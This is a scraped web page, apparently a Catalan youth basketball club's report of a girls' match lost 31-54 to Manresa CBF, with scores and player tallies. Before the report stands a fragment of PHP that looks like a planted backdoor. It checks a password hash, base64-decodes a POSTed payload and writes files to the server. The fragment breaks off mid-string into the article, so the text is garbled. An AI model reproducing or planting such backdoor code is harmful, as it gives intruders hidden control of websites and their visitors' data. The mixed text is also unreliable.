function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Derrota contra el Manresa -

Derrota contra el Manresa

Updated: novembre 8, 2022

L’Infantil femení de primer any 10A va rebre la visita del Manresa CBF en un partit en el qual en el primer quart es van imposar les defenses. En el segon quart el Manresa es va distanciar en el marcador. Tot i això, en el tercer quart el TGN va intentar apropar-se en el marcador. El Manresa va estar encertat en atac i va aconseguir imposar-se còmodament guanyant el partit per més de 20 punts de diferència.

TGN BÀSQUET 10A31 – MANRESA CBF U13: 54

PARCIALS: 7-8, 6-16, 12-17, 6-13

TGN BÀSQUET 10A: Valls (5), Seoane (6), Bueso (3), Parera (2) i Ramon (-)—cinc inicial—Dominguez (-), Cabré (5), Porta (-) i Socias (10). LES XIFRES DEL PARTIT: 5/13 tirs lliures | 19 faltes

MANRESA CBF U13: Garcia (6), Soler (8), Serra (9), Isanta (5) i Vendrell (3)—cinc inicial—Tabares (12), Servitja (4), Andrades (2), Canyelles (4), Vendrell (-) i Lopez (1). LES XIFRES DEL PARTIT: 8/20 tirs lliures | 18 faltes